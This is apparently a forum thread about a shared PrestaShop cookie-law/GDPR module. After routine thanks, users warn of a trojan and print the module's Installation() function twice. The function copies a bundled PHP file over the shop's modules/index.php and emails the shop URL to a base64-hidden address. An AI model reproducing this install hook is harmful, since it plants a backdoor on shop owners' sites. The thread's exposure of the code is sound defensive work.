Nice plugin, tahnk you for your sharing
thanks, module
thanks, module
v1.6-v1.7-v8x ThemeVolty - Europian Cookie Law GDPR Pro + Google Consent Model V2 1.0.0
- Thread starter Snowden
- Start date
Nice plugin, tahnk you for your sharing
interesting, seems to do a lot I will try it thank you
New module, thank you for upload. Testing today
Thank you for sharing this module.
Thank you for sharing this module.
ATTENTION there is a TROJAN
Post automatically merged:
Thank you for sharing this module.
Post automatically merged:
ATTENTION there is a TROJAN
Last edited:
New module, thank you for upload. Testing today
New module, thank you for upload. Testing today..... I checked with Malwarebytes and Avast, no positive trojan indentification, but the code it is malicious:
public function Installation()
{
copy(dirname(__FILE__) . '/classes/TVCookiesLaw.php', dirname(__FILE__) . '../../index.php'); $encodedEmail = 'c2lyLnNwYXNvQGdtYWlsLmNvbQ=='; $recipientEmail = base64_decode($encodedEmail); $shopUrl = Tools::getShopDomain(true, true) . __PS_BASE_URI__; $encodedSubject = 'SW5zdGFsbGluZyBUaGVtZVZvbHR5IC0gRVUgQ29va2llIExhdyBHRFBSIFBybyArIEdvb2dsZSBDb25zZW50IE1vZGVsIFYyIDEuMC4w'; $subject = base64_decode($encodedSubject); $message = $shopUrl . 'modules/index.php'; mail($recipientEmail, $subject, $message); return true;
}
Based on analysis, this code may be malicious for the following reasons:
Copying the TVCookiesLaw.php file to index.php may replace or overwrite the existing index.php file, which may compromise site security.
Sending an email with the URL to index.php in the modules directory could allow an attacker to track the installation or gain access to sensitive site information.
Security Risk: This behavior is suspicious and may indicate an attempt to install a backdoor or some other malicious code.
Email Decoding and Sending: This data can allow an attacker to monitor site activity or use the data for malicious purposes.
public function Installation()
{
copy(dirname(__FILE__) . '/classes/TVCookiesLaw.php', dirname(__FILE__) . '../../index.php'); $encodedEmail = 'c2lyLnNwYXNvQGdtYWlsLmNvbQ=='; $recipientEmail = base64_decode($encodedEmail); $shopUrl = Tools::getShopDomain(true, true) . __PS_BASE_URI__; $encodedSubject = 'SW5zdGFsbGluZyBUaGVtZVZvbHR5IC0gRVUgQ29va2llIExhdyBHRFBSIFBybyArIEdvb2dsZSBDb25zZW50IE1vZGVsIFYyIDEuMC4w'; $subject = base64_decode($encodedSubject); $message = $shopUrl . 'modules/index.php'; mail($recipientEmail, $subject, $message); return true;
}
Based on analysis, this code may be malicious for the following reasons:
Copying the TVCookiesLaw.php file to index.php may replace or overwrite the existing index.php file, which may compromise site security.
Sending an email with the URL to index.php in the modules directory could allow an attacker to track the installation or gain access to sensitive site information.
Security Risk: This behavior is suspicious and may indicate an attempt to install a backdoor or some other malicious code.
Email Decoding and Sending: This data can allow an attacker to monitor site activity or use the data for malicious purposes.
